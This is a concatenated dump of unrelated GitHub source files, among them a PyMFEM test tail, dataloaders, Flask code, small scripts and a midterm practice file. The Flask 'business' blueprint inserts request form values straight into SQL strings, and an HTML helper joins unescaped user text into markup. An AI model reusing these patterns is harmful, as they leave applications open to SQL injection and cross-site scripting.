mfem.tmop.vis_tmop_metric_s(mesh_poly_deg, metric, target_c, mesh, \"Final metric values\", 600);\n\n # 17. Visualize the mesh displacement.\n if visualization:\n x0 -= x\n sock = mfem.socketstream(\"localhost\", 19916)\n sock << \"solution\\n\" << mesh << x0\n sock.flush()\n sock << \"window_title 'Displacements'\\n\" << \"window_geometry \"\n sock << 1200 << \" \" << 0 << \" \" << 600 << \" \" << 600 << \"\\n\"\n sock << \"keys jRmclA\"\n sock.flush() \n\n\nif __name__ == \"__main__\":\n from mfem.common.arg_parser import ArgParser\n\n parser = ArgParser(description='meshOptMWE')\n parser.add_argument('-m', '--mesh',\n default='square01.mesh', # icf.mesh\n action='store', type=str,\n help='Mesh file to use.')\n parser.add_argument('-o', '--order',\n action='store', default=1, type=int,\n help=\"Finite element order (polynomial degree) or -1 for isoparametric space.\")\n parser.add_argument('-rs', '--refine-serial',\n action='store', default=2, type=int,\n help=\"Number of times to refine the mesh uniformly in serial\")\n parser.add_argument(\"-mid\", \"--metric-id\",\n action=\"store\", default=80, type=int,\n help=\"\\n\".join([\"Mesh optimization metric:\",\n \"\\tT-metrics\",\n \"2 : 0.5|T|^2/tau-1 -- 2D shape (condition number)\\n\\t\"]))\n parser.add_argument(\"-tid\", \"--target-id\",\n action=\"store\", default=5, type=int, \n help=\"\\n\".join([\"Target (ideal element) type:\",\n \"\\t5: Ideal shape, given size (in physical space)\"]))\n parser.add_argument(\"-qt\", \"--quad-type\",\n action=\"store\", default=1, type=int, \n help=\"\\n\".join([\"Quadrature rule type:\",\n \"\\t1: Gauss-Lobatto\",\n \"\\t2: Gauss-Legendre\"\n \"\\t3: Closed uniform points\"]))\n parser.add_argument(\"-qo\", \"--quad_order\",\n action=\"store\", default=4, type=int, \n help=\"Order of the quadrature rule.\")\n parser.add_argument(\"-st\", \"--solver-type\",\n action=\"store\", default=0, type=int,\n help = \" Type of solver: (default) 0: Newton, 1: LBFGS\")\n parser.add_argument(\"-ni\", \"--newton-iters\",\n action=\"store\", default=80, type=int, \n help=\"Maximum number of Newton iterations.\")\n parser.add_argument(\"-rtol\", \"--newton-rel-tolerance\",\n action=\"store\", default=1e-10, type=float,\n help=\"Relative tolerance for the Newton solver.\")\n parser.add_argument(\"-art\", \"--adaptive-rel-tol\",\n action=\"store\", default=0, type=int, \n help=\"\\n\".join([\"Type of adaptive relative linear solver tolerance:\",\n \"\\t0: None (default)\",\n \"\\t1: Eisenstat-Walker type 1\",\n \"\\t2: Eisenstat-Walker type 2\"]))\n parser.add_argument(\"-ls\", \"--lin-solver\",\n action=\"store\", default=2, type=int, \n help=\"\\n\".join([\"Linear solver:\",\n \"\\t0: l1-Jacobi\",\n \"\\t1: CG\",\n \"\\t2: MINRES\",\n \"\\t3: MINRES + Jacobi preconditioner\",\n \"\\t4: MINRES + l1-Jacobi preconditioner\"]))\n parser.add_argument(\"-li\", \"--lin-iter\",\n action=\"store\", default=100, type=int, \n help=\"Maximum number of iterations in the linear solve.\")\n parser.add_argument(\"-hr\", \"--hr-adaptivity\", \n action='store_true',\n help=\"Enable hr-adaptivity.\")\n parser.add_argument(\"-nor\", \"--normalization\", \n action='store_true',\n help=\"Make all terms in the optimization functional unitless.\")\n parser.add_argument('-no-vis', '--no-visualization',\n action='store_true',\n help='Enable GLVis visualization')\n parser.add_argument(\"-vl\", \"--verbosity-level\",\n action=\"store\", default=2, type=int, \n help=\"Set the verbosity level - 0, 1, or 2.\")\n\n\n parser.add_argument(\"-ae\", \"--adaptivity-evaluator\",\n action=\"store\", default=1, type=int, \n help=\"0 - Advection based (DEFAULT), 1 - GSLIB.\");\n\n parser.add_argument(\"-nhr\", \"--n_hr_iter\",\n action=\"store\", default=5, type=int,\n help=\"Number of hr-adaptivity iterations.\")\n\n parser.add_argument(\"-nh\", \"--n_h_iter\",\n action=\"store\", default=1, type=int,\n help=\"Number of h-adaptivity iterations per r-adaptivity\")\n \n args = parser.parse_args()\n parser.print_options(args)\n \n run(args)\n","repo_name":"mfem/PyMFEM","sub_path":"test/test_tmop.py","file_name":"test_tmop.py","file_ext":"py","file_size_in_byte":13613,"program_lang":"python","lang":"en","doc_type":"code","stars":159,"dataset":"github-code","pt":"48"} +{"seq_id":"39648823076","text":"\"\"\"\nugvkp Dataloader\njieli_cn@163.com\n2019/1/11\n\"\"\"\nimport os\n\ntry:\n import ujson as json\nexcept ImportError:\n import json\n\nfrom torchvision.transforms import ToTensor\nfrom training.datasets.ugv_data.UGV_data_pipeline import UGVKeyPoints\nfrom training.datasets.dataloader import sDataLoader\n\n\ndef get_loader(json_path, data_dir, mask_dir, inp_size, feat_stride, preprocess,\n batch_size, params_transform, training=True, shuffle=True, num_workers=1, aug=False, classification = False):\n \"\"\" Build a COCO dataloader\n :param json_path: string, path to jso file\n :param datadir: string, path to coco data\n :returns : the data_loader\n \"\"\"\n\n json_data = list()\n if isinstance(json_path, list): # 将多个root\n\n root = os.path.dirname(json_path[0])\n for json_i in json_path:\n print(json_i)\n with open(json_i) as data_file:\n json_data_i = json.load(data_file)\n json_data.extend(json_data_i)\n # print(len(json_data_i), type(json_data_i))\n # print(len(json_data))\n\n elif isinstance(json_path, str):\n root = os.path.dirname(json_path)\n with open(json_path) as data_file:\n json_data = json.load(data_file)\n # data_this = json.load(data_file)\n # data = data_this['root']\n\n num_samples = len(json_data)\n train_indexes = []\n val_indexes = []\n for count in range(num_samples):\n if json_data[count]['isValidation'] != 0.:\n val_indexes.append(count)\n else:\n train_indexes.append(count)\n\n # print('train dataset len:', len(train_indexes), ' val dataset len:', len(val_indexes))\n\n # root = data_dir\n # root = os.path.dirname(json_path)\n\n kik_data = UGVKeyPoints(root=root,\n index_list=train_indexes if training else val_indexes,\n data=json_data, feat_stride=feat_stride,\n preprocess=preprocess, transform=ToTensor(), params_transform=params_transform,\n numkeypoints=4, numlims=4, aug=aug, classification=classification) # Mod by Jie.\n\n data_loader = sDataLoader(kik_data, batch_size=batch_size, shuffle=shuffle, num_workers=num_workers)\n\n return data_loader\n\n","repo_name":"waterljwant/UGV-KPNet","sub_path":"training/datasets/ugvkp.py","file_name":"ugvkp.py","file_ext":"py","file_size_in_byte":2288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33406185734","text":"from ulakbus import settings\nfrom ulakbus.models import BAPFirma, User\nfrom zengine.lib.test_utils import BaseTestCase\n\n\nclass TestCase(BaseTestCase):\n \"\"\"\n Firmaların, teklife açık bütçe kalemlerine \n teklif vermesini sağlayan iş akışı testi.\n\n \"\"\"\n\n def test_bap_firma_basvuru_degerlendirme(self):\n firma = BAPFirma.objects.get(\"5uGjOb0fj9rzGwfIwYoSIN2pNRH\")\n self.prepare_client('/bap_firma_basvuru_degerlendirme',\n username='bap_koordinasyon_birimi_1')\n resp = self.client.post()\n\n # listeleme ekranı\n assert resp.json['forms']['schema']['title'] == \"Firma Başvuru Değerlendirmeleri\"\n assert \"Firma Adı\" in resp.json['objects'][0]\n assert \"Vergi Kimlik Numarası\" in resp.json['objects'][0]\n action_names = [\"Karar Ver\", \"İncele\"]\n for action in resp.json['objects'][1]['actions']:\n assert action['name'] in action_names\n\n # incele\n resp = self.client.post(wf='bap_firma_basvuru_degerlendirme', cmd=\"incele\",\n object_id=\"5uGjOb0fj9rzGwfIwYoSIN2pNRH\")\n assert \"Firması Kayıt Başvurusu Değerlendirme\" in resp.json['forms']['schema']['title']\n assert resp.json['object']['Firma Adı'] == 'Veli Usta Dondurma'\n assert resp.json['object']['Vergi No'] == '8402384024802'\n\n # geri don\n resp = self.client.post(wf='bap_firma_basvuru_degerlendirme', cmd=\"geri_don\")\n assert resp.json['forms']['schema']['title'] == \"Firma Başvuru Değerlendirmeleri\"\n\n # karar, geri don\n resp = self.client.post(wf='bap_firma_basvuru_degerlendirme', cmd=\"karar_ver\",\n object_id=\"5uGjOb0fj9rzGwfIwYoSIN2pNRH\")\n assert \"Firması Başvuru Değerlendirme Kararı\" in resp.json['forms']['schema']['title']\n assert \"değerlendirme kararınızı veriniz\" in resp.json['forms']['form'][0]['helpvalue']\n resp = self.client.post(wf='bap_firma_basvuru_degerlendirme', cmd=\"red\", form={'red': 1})\n assert \"Firması Başvuru Reddi Gerekçesi\" in resp.json['forms']['schema']['title']\n resp = self.client.post(wf='bap_firma_basvuru_degerlendirme', cmd=\"gonder\",\n form={'gerekce': \"Belgeler eksik\"})\n assert \"Firması Başvuru Reddi\" in resp.json['forms']['schema']['title']\n resp = self.client.post(wf='bap_firma_basvuru_degerlendirme', cmd=\"geri_don\",\n form={'geri': 1})\n assert \"Firması Başvuru Değerlendirme Kararı\" in resp.json['forms']['schema']['title']\n resp = self.client.post(wf='bap_firma_basvuru_degerlendirme', cmd=\"geri_don\",\n form={'geri': 1})\n assert resp.json['forms']['schema']['title'] == \"Firma Başvuru Değerlendirmeleri\"\n\n # karar, red\n self.client.post(wf='bap_firma_basvuru_degerlendirme', cmd=\"karar_ver\",\n object_id=\"5uGjOb0fj9rzGwfIwYoSIN2pNRH\")\n self.client.post(wf='bap_firma_basvuru_degerlendirme', cmd=\"red\", form={'red': 1})\n self.client.post(wf='bap_firma_basvuru_degerlendirme', cmd=\"gonder\",\n form={'gerekce': \"Belgeler eksik\"})\n resp = self.client.post(wf='bap_firma_basvuru_degerlendirme', cmd=\"onayla\",\n form={'onayla': 1})\n assert resp.json['msgbox']['title'] == \"Firma Başvuru Kaydı Değerlendirme\"\n assert 'firma yetkilisine başarıyla iletilmiştir' in resp.json['msgbox']['msg']\n\n del resp.json['objects'][0]\n firma_adlari_list = [obj['fields'][0] for obj in resp.json['objects']]\n assert \"Veli Usta Dondurma\" not in firma_adlari_list\n kullanici = firma.Yetkililer[0].yetkili\n assert User.objects.filter(key=kullanici.key).count() == 0\n assert BAPFirma.objects.filter(key=\"5uGjOb0fj9rzGwfIwYoSIN2pNRH\").count() == 0\n firma = BAPFirma.objects.filter(key=\"5uGjOb0fj9rzGwfIwYoSIN2pNRH\", deleted=True)[0]\n kullanici = User.objects.filter(key=kullanici.key, deleted=True)[0]\n firma.deleted = False\n firma.save()\n kullanici.deleted = False\n kullanici.save()\n\n # karar, onayla\n assert resp.json['forms']['schema']['title'] == \"Firma Başvuru Değerlendirmeleri\"\n self.client.post(wf='bap_firma_basvuru_degerlendirme', cmd=\"karar_ver\",\n object_id=\"OzRUS2vPOp12ju4Oj47CwaeRvV6\")\n resp = self.client.post(wf='bap_firma_basvuru_degerlendirme', cmd=\"onayla\",\n form={'onayla': 1})\n assert \"Firması Başvuru Kabulü\" in resp.json['forms']['schema']['title']\n assert \"onaylıyor musunuz\" in resp.json['forms']['form'][0]['helpvalue']\n resp = self.client.post(wf='bap_firma_basvuru_degerlendirme', cmd=\"onayla\",\n form={'onayla': 1})\n\n firma = BAPFirma.objects.get(\"OzRUS2vPOp12ju4Oj47CwaeRvV6\")\n assert firma.durum == 2\n\n assert resp.json['msgbox']['title'] == \"Firma Başvuru Kaydı Değerlendirme\"\n assert firma.ad in resp.json['msgbox']['msg']\n\n del resp.json['objects'][0]\n firma_adlari_list = [obj['fields'][0] for obj in resp.json['objects']]\n assert firma.ad not in firma_adlari_list\n\n kullanici = firma.Yetkililer[0].yetkili\n assert kullanici.is_active == True\n role = kullanici.role_set[0].role\n assert 'bap_firma_teklif' in role.get_permissions()\n\n firma.durum = 1\n firma.blocking_save()\n kullanici.is_active = False\n kullanici.blocking_save()\n\n # belge indir\n firma = BAPFirma.objects.get(\"5uGjOb0fj9rzGwfIwYoSIN2pNRH\")\n self.prepare_client('/bap_firma_basvuru_degerlendirme',\n username='bap_koordinasyon_birimi_1')\n self.client.post()\n\n self.client.post(wf='bap_firma_basvuru_degerlendirme', cmd=\"incele\",\n object_id=\"5uGjOb0fj9rzGwfIwYoSIN2pNRH\")\n resp = self.client.post(wf='bap_firma_basvuru_degerlendirme', cmd=\"indir\",\n form={\"belge_indir\": 1})\n assert resp.json['download_url'] == \"%s%s\" % (\n settings.S3_PUBLIC_URL, firma.faaliyet_belgesi)\n","repo_name":"zetaops/ulakbus","sub_path":"tests/test_bap_firma_basvuru_degerlendirme.py","file_name":"test_bap_firma_basvuru_degerlendirme.py","file_ext":"py","file_size_in_byte":6283,"program_lang":"python","lang":"tr","doc_type":"code","stars":101,"dataset":"github-code","pt":"48"} +{"seq_id":"18402958281","text":"import threading\nimport time\n\nclass Queue:\n def __init__(self):\n self.sth=-1\n self.cond=threading.Condition()\n\n def put(self,sth):\n with self.cond:\n while self.sth != -1:\n self.cond.wait()\n self.sth=sth\n self.cond.notify()\n\n def take(self):\n with self.cond:\n while self.sth == -1:\n self.cond.wait()\n res=self.sth\n self.sth=-1\n self.cond.notify()\n return res\n\ndef producer(queue):\n for sth in range(5):\n queue.put(sth)\n print(\"队列中放入{}\".format(sth))\n time.sleep(1)\n\ndef consumer(queue):\n for i in range(5):\n res=queue.take()\n print(\"队列中取出{}\".format(res))\n time.sleep(1)\n\nqueue=Queue()\np = threading.Thread(target=producer,args=(queue,))\nc = threading.Thread(target=consumer,args=(queue,))\n\np.start()\nc.start()\n\n\n\n\n","repo_name":"hellozepp/gitbyhellozepp","sub_path":"python/iotest-pyy/iotestpy/parallel/thread/conditiontest1.py","file_name":"conditiontest1.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"73823467985","text":"from flask import redirect, render_template, request, session, abort\nfrom functools import wraps\nimport ast\n\nimport datetime\n\nAPP_DATE_FORMAT = '%d/%m/%Y'\n\ndef loginRequired(route):\n \"\"\" Verify if user is logged-in for pages where it is required. \"\"\"\n @wraps(route)\n def decorated_route(*args, **kwargs):\n if session.get('user_id') is None:\n return redirect('/login')\n return route(*args, **kwargs)\n return decorated_route\n\ndef loggedInNotAllowed(route):\n \"\"\" Verify if a logged user is trying to access a page for not logged in users. \"\"\"\n @wraps(route)\n def decorated_route(*args, **kwargs):\n if not(session.get('user_id') is None):\n return redirect('/')\n return route(*args, **kwargs)\n return decorated_route\n\ndef checkAllowance(allowance):\n \"\"\"Verify if user has the allowance level for the selected page\"\"\"\n def innerDecor(route):\n @wraps(route)\n def decorated_route(*args, **kwargs):\n if session.get('user_info'):\n if session['user_info']['allowance'] >= allowance:\n return route(*args, **kwargs)\n else:\n return abort(403)\n else:\n return abort(403)\n return decorated_route\n return innerDecor\n\ndef renderEditorData(editor_data):\n WARNING_SYMBOL = ''\n editor_data = ast.literal_eval(editor_data)\n rendered_html = ''\n for item in editor_data:\n new_html = ''\n if not rendered_html == '':\n rendered_html = rendered_html + '\\n'\n if item['type'] == 'paragraph':\n new_html = '

'+item['data']['text']+'

'\n \n elif item['type'] == 'list':\n \n if item['data']['style'] == 'unordered':\n new_html = '
    '\n for li in item['data']['items']:\n print('li:' + li)\n new_html = new_html + '
  • '+ li + '
  • '\n new_html = new_html + '

'\n elif item['data']['style'] == 'ordered':\n new_html = '
    '\n for li in item['data']['items']:\n print('li:' + li)\n new_html = new_html + '
  1. '+ li + '
  2. '\n new_html = new_html + '
    '\n \n elif item['type'] == 'header':\n classes = {\n 1:\"font-inputs text-3xl text-center my-3 font-extrabold\",\n 2:\"font-inputs text-2xl text-center my-3 font-bold\",\n 3:\"font-inputs text-xl text-center my-3 font-medium\",\n 4:\"font-inputs text-lg text-center my-3 font-medium\",\n 5:\"font-inputs text-lg text-center my-3 font-medium\",\n 6:\"font-inputs text-lg text-center my-3 font-medium\"\n }\n new_html = '' + item['data']['text'] + ''\n elif item['type'] == 'quote':\n new_html = '
    \"

    '+item['data']['text']+'

    \"
    — '+item['data']['caption']+'
    '\n elif item['type'] == 'warning':\n new_html = '
    cc'+item['data']['title']+'
    '+WARNING_SYMBOL+''+item['data']['message']+'
    '\n elif item['type'] == 'image':\n new_html = '
    '+item['data']['caption']+'
    '\n elif item['type'] == 'linkTool':\n pass\n rendered_html = rendered_html + new_html\n\n \n\n\n return rendered_html","repo_name":"araujoarthur/RoseOnWiki","sub_path":"helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":4703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74748261265","text":"import cv2\r\nimport numpy as np\r\n\r\nimage = cv2.imread('resim1.jpg')\r\nred_channel, green_channel, blue_channel = cv2.split(image)\r\n\r\ncv2.imshow('Red', red_channel)\r\ncv2.waitKey(0)\r\ncv2.imshow('Green', green_channel)\r\ncv2.waitKey(0)\r\ncv2.imshow('Blue', blue_channel)\r\ncv2.waitKey(0)\r\n\r\n\r\nno_green_image = cv2.merge((blue_channel,np.zeros_like(green_channel),red_channel))\r\ncv2.imshow('No green image', no_green_image)\r\ncv2.waitKey(0)\r\n\r\noriginal_coloured_image = cv2.merge((blue_channel, green_channel, red_channel))\r\ncv2.imshow('Original image', original_coloured_image)\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()","repo_name":"berkeakdnz/-SE226-","sub_path":"lab7/lab7.py","file_name":"lab7.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15451971795","text":"#Takes in a first name and a last name, and prints out a full name, in a sentence\n#call the function three times\n\n\ndef nome_a_caso (name, surname):\n\n\tfull = (name + ' ' + surname)\n\tprint('ciao %s' %full)\n\nnames = {'Roberto': 'Giallo', 'Bilbo':'Baggins', 'Sheldon':'Cooper'}\n\nfor name, surname in names.items():\n\tnome_a_caso(name,surname)\n\n \n","repo_name":"elebonel/testrepo","sub_path":"fullnames.py","file_name":"fullnames.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"9594978234","text":"import pandas\nimport random\nimport matplotlib\nimport numpy as np\nimport matplotlib.pyplot as plts\n\nmass = [float(m) for m in input(\"Введите все значение масс грузов через пробел\").split()]\nmass = np.array(mass)\n\nplts.bar(list(range(len(mass))), mass)\nplts.title('Experimental data')\n\ndf = pandas.DataFrame(data={\n 'mass': mass\n})\n\ndf.to_csv(\"mass.csv\")\n\ndf1 = pandas.read_csv(\"mass.csv\")\n\ndf1['mass'].plot(kind='bar')\n\ndf12 = pandas.DataFrame(data={\n 'df1': df1['mass']})\n\ndf12.plot.kde()\n\nfrom scipy import stats\n\nd1 = df12['df1']\n\nplts.show()\n\nprint(stats.kstest(d1, 'norm', (d1.mean(), d1.std()), N=5000))\n","repo_name":"Mikhail000Yasinski/1","sub_path":"stat_istik.py","file_name":"stat_istik.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"10053244094","text":"class Solution:\n def checkIfExist(self, arr: List[int]) -> bool:\n val = 0\n for i in range(len(arr)):\n val = arr[i]\n for j in range(i+1,len(arr),1):\n if (val == 2*arr[j] or arr[j] == 2*val):\n print(val,arr[j])\n return True\n return False","repo_name":"akshatasingh21/python101","sub_path":"Leetcode/1346. Check If N and Its Double Exist.py","file_name":"1346. Check If N and Its Double Exist.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"27421290964","text":"\"\"\"An example script showing the functionality of get_game_data_lichess. Plots\nthe results of 25 000 rated Lichess games played in December 2012 (ignoring\ngames that aren\"t Blitz, Bullet or Classical).\"\"\"\n\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nfrom utils import get_game_data_lichess\n\n\n# Globals\nFILE_PATH = \"lichess_db_standard_rated_2013-01.pgn.bz2\"\nTAGS = {\"Event\", \"Result\"}\nTIME_FORMATS = [\"Bullet\", \"Blitz\", \"Classical\"]\nGAME_RESULTS = [\"1-0\", \"1/2-1/2\", \"0-1\"]\nGAME_RESULTS_LABELS = [\"White win\", \"Draw\", \"Black win\"]\nCOLORS = [\"#fffa9e\", \"#eb6746\", \"#a6174c\"]\nGAMES_N = 25000\n\n\ndef main() -> None:\n \"\"\"The main function.\"\"\"\n\n data = np.zeros([3, 3])\n game_generator = get_game_data_lichess(FILE_PATH, TAGS, max_games=GAMES_N)\n\n # Goes through the games and tallies their results.\n for game in game_generator:\n time_format = game[\"Event\"].split()[1]\n if time_format not in TIME_FORMATS:\n continue\n time_index = TIME_FORMATS.index(time_format)\n result_index = GAME_RESULTS.index(game[\"Result\"])\n data[result_index][time_index] += 1\n\n # Scales results for each time format.\n for i in range(len(data)):\n data[:, i] *= 100 / np.sum(data[:, i])\n\n # Displays the plot.\n axes = plt.subplots()[1]\n cumulative_sum = np.zeros(data.shape[0])\n\n for i, value in enumerate(data):\n axes.bar(\n TIME_FORMATS,\n value,\n 0.35,\n bottom=cumulative_sum,\n label=GAME_RESULTS_LABELS[i],\n color=COLORS[i]\n )\n cumulative_sum += data[i]\n\n axes.set_ylabel(\"Results (percentage)\")\n axes.set_title(\"Lichess game results by time format\")\n axes.legend()\n\n plt.show()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"midnattssol/Chess-Statistics-Toolkit","sub_path":"example_get_games.py","file_name":"example_get_games.py","file_ext":"py","file_size_in_byte":1781,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"71351492945","text":"\"\"\"\nFile: Spring 2016 Midterm Practice\nName: Ethan Ton\n\"\"\"\n\n\"\"\"\nQuestion 1.\n\nExpression:(3 and abs)(-1)\nOutput:\n1\n\nExpression: print(3) or 1/0\nOutput:\n3\nError\n\nExpression: print\nOutput:\nFunction\n\nExpression: ([1, 2, 3] if y // (y+1) else [4, 5]) [1]\nOutput:\n5\n\nExpression: w(5)\nOutput:\n3\n\"\"\"\n\n\"\"\"\nQuestion 1b.\nExpression: print(d([1, 2, 3]), d([0, 1, 2, 1, 0]))\nOutput:\nFalse True\n\"\"\"\n\n\"\"\"\nQuestion 2.\nGlobal Frame\n y = 3\n out = func out(h, m)\n v = 5\n \nf1: out\nparent: Global\n h = None\n m = 1\n inner = func inner()\n y = 5\n return value = func inner()\n \nf2: out \nparent: Global\n h = func ininer()\n m = 0\n inner = func inner()\n y = 0\n return value = func inner()\n \nf3: inner\nparent: f1\n return value = 5\n\"\"\"\n\n\"\"\"\nQuestion 2b.\n\nGlobal Frame\n lazy = func lazy(n)\n v = 5\n \nf1: lazy\nparent: Global\n n = 4\n return value = lambda func line 2\n \nf2: lambda line 2\nparent: f1\n k = 1\n return value = lambda func line 2\n \nf3: lazy\nparent: Global \n n = 5\n return value = lambda func line 2\n \nf4: lambda line 2\nparent: f3\n k = 0\n return value = 5\n\"\"\"\n\n#Question 4.\ndef has_cycle(L, k):\n def cycle_at(s):\n p = L[s]\n n = 1\n while n < k:\n if p == s:\n return False\n p = L[p]\n n += 1\n return p == s\n for j in range(len(L)):\n if cycle_at(j):\n return True\n return False\n\n#Question 5\ndef count_groupings(n):\n if n == 1:\n return 1\n total = 0\n i = 1\n while i < n:\n total += count_groupings(i) * count_groupings(n - i)\n i += 1\n return total\n\n#Question 6\ndef pred_maze(x0, y0, open, exit):\n def maze(dir):\n x, y = (x0, y0 - 1) if dir == \"south\" else (x0 -1 , y0)\n if x <= exit:\n return \"exit\"\n elif open(x, y):\n return pred_maze(x, y, open, exit)\n else:\n return \"dead end\"\n return maze\n\n#Question 6b.\ndef path_out(M):\n for dir in [\"south\", \"west\"]:\n next = M(dir)\n if next == \"exit\":\n return dir + \" \"\n elif next != \"dead end\":\n rest_of_path = path_out(next)\n if rest_of_path:\n return dir + \" \" + rest_of_path\n return None","repo_name":"ethanton0927/Midterm","sub_path":"Spring_2016.py","file_name":"Spring_2016.py","file_ext":"py","file_size_in_byte":2358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22182314065","text":"#\n# Matrix\n# 5 September 2022\n#\n\nimport random\nfrom operator import itemgetter\n\n\ndef run(matrix, config):\n\t\"\"\" Matrix \"\"\"\n\tlines = []\n\tmin_y = 0\n\tmin_x = 0\n\tmax_y = config['pixel_height']\n\tmax_x = config['pixel_width']\n\n\t# max speed of line movement\n\tmax_speed = 6\n\n\t# percent chance each pixel in a line goes missing to simulate static\n\tpercent_static = 0.20\n\n\tmatrix_color = matrix.color('green')\n\tbackground_color = matrix.color('black')\n \n\t# create a new matrix line about to drop down\n\tdef new_line():\n\t\tline_len = random.randrange(max_y)\n\t\treturn {'tail': -line_len, 'head': min_y, 'speed': random.randrange(1, max_speed)}\n\n\t# create initial matrix lines\n\tfor _ in range(max_x):\n\t\tlines.append(new_line())\n\n\twhile matrix.ready(): \n\t\tmatrix.reset(background_color)\n\t\t\n\t\tfor i in range(max_x):\n\t\t\thead, tail, speed = itemgetter('head', 'tail', 'speed')(lines[i])\n\t\t\thead += speed\n\t\t\ttail += speed\n\t\t\tmatrix.line((i, head), (i, tail), matrix_color, 1)\n\n\t\t\t# add dead pixels in the matrix line to simulate static\n\t\t\tfor j in range(tail, head):\n\t\t\t\tif random.random() < percent_static:\n\t\t\t\t\tmatrix.pixel((i, j), background_color)\n\t\t\t\n\t\t\t# if matrix line drops below screen, create a new matrix line\n\t\t\tif tail > max_y:\n\t\t\t\tlines[i] = new_line()\n\t\t\telse:\n\t\t\t\tlines[i] = {'tail': tail, 'head': head, 'speed': speed}\n\n\t\tmatrix.show()\n","repo_name":"natelewis/pi-led-matrix","sub_path":"effects/matrix/effect.py","file_name":"effect.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} +{"seq_id":"42950031421","text":"from flask import Blueprint, request, jsonify, make_response\nfrom src import db\n\nbusiness = Blueprint('business', __name__)\n\n\n# Get specific business\n@business.route('/business/int_BusinessID', methods=['GET'])\ndef get_id(BusinessID):\n # get a cursor object from the database\n cursor = db.get_db().cursor()\n\n # query the database for\n cursor.execute(\n 'select BusinessID, BusinessName, EmployeeCount, ZipCode, City, State, Country from Businesses where BusinessID={id}'.format(\n id=BusinessID))\n\n # grab the column headers from the returned data\n column_headers = [x[0] for x in cursor.description]\n\n # create an empty dictionary object to use in\n # putting column headers together with data\n json_data = []\n\n # fetch all the data from the cursor\n theData = cursor.fetchall()\n\n # for each of the rows, zip the data elements together with\n # the column headers.\n for row in theData:\n json_data.append(dict(zip(column_headers, row)))\n\n return jsonify(json_data)\n\n\n@business.route('/business/')\ndef get_small_businesses(employee_count):\n # get a cursor object from the database\n cursor = db.get_db().cursor()\n\n # use cursor to query the database for businesses that have an employee count that is less than the employee count entered\n cursor.execute(\n 'select BusinessID, BusinessName, EmployeeCount, ZipCode, City, State, Country from Businesses WHERE EmployeeCount < {employee_count}'.format(\n employee_count=employee_count))\n\n # grab the column headers from the returned data\n column_headers = [x[0] for x in cursor.description]\n\n # create an empty dictionary object to use in\n # putting column headers together with data\n json_data = []\n\n # fetch all the data from the cursor\n theData = cursor.fetchall()\n\n # for each of the rows, zip the data elements together with\n # the column headers.\n for row in theData:\n json_data.append(dict(zip(column_headers, row)))\n return jsonify(json_data)\n\n\n# add a business to our database\n@business.route('/business/add_business', methods=['GET', 'POST'])\ndef add_business():\n cursor = db.get_db().cursor()\n BusinessID = str(request.form['BusinessID'])\n BusinessName = str(request.form['BusinessName'])\n EmployeeCount = str(request.form['EmployeeCount'])\n ZipCode = str(request.form['ZipCode'])\n City = str(request.form['City'])\n State = str(request.form['State'])\n Country = str(request.form['Country'])\n\n cursor.execute(\n f'INSERT INTO Businesses(BusinessID, BusinessName, EmployeeCount, ZipCode, City, State, Country) VALUES (\"{BusinessID}\", \"{BusinessName}\", \"{EmployeeCount}\", \"{ZipCode}\", \"{City}\", \"{State}\", \"{Country}\")')\n db.get_db().commit()\n return \"Success\"\n\n\n\n# view the businesses\n@business.route('/business', methods=['GET'])\ndef get_businesses():\n cursor = db.get_db().cursor()\n cursor.execute('SELECT * FROM Businesses')\n row_headers = [x[0] for x in cursor.description]\n json_data = []\n theData = cursor.fetchall()\n for row in theData:\n json_data.append(dict(zip(row_headers, row)))\n the_response = make_response(jsonify(json_data))\n the_response.status_code = 200\n the_response.mimetype = 'application/json'\n return the_response\n\n@business.route('/get_business/')\ndef get_all_class(employee_count):\n cursor = db.get_db().cursor()\n query = f'''\n SELECT BusinessID, BusinessName, EmployeeCount\n FROM Businesses\n WHERE EmployeeCount < '{employee_count}'\n '''\n cursor.execute(query)\n # grab the column headers from the returned data\n column_headers = [x[0] for x in cursor.description]\n\n # create an empty dictionary object to use in\n # putting column headers together with data\n json_data = []\n\n # fetch all the data from the cursor\n theData = cursor.fetchall()\n\n # for each of the rows, zip the data elements together with\n # the column headers.\n for row in theData:\n json_data.append(dict(zip(column_headers, row)))\n\n return jsonify(json_data)\n\n\n# Get all people from personal\n@business.route('/business', methods=['GET'])\ndef get_employee_num():\n cursor = db.get_db().cursor()\n cursor.execute('SELECT * FROM Businesses')\n row_headers = [x[0] for x in cursor.description]\n json_data = []\n theData = cursor.fetchall()\n for row in theData:\n json_data.append(dict(zip(row_headers, row)))\n the_response = make_response(jsonify(json_data))\n the_response.status_code = 200\n the_response.mimetype = 'application/json'\n return the_response","repo_name":"p3rciv3l/KeyBase","sub_path":"flask-app/src/business/business.py","file_name":"business.py","file_ext":"py","file_size_in_byte":4647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17787599341","text":"'''\n给你两个单链表的头节点 headA 和 headB ,请你找出并返回两个单链表相交的起始节点。如果两个链表不存在相交节点,返回 null 。\n\n图示两个链表在节点 c1 开始相交:\n'''\n\n# Definition for 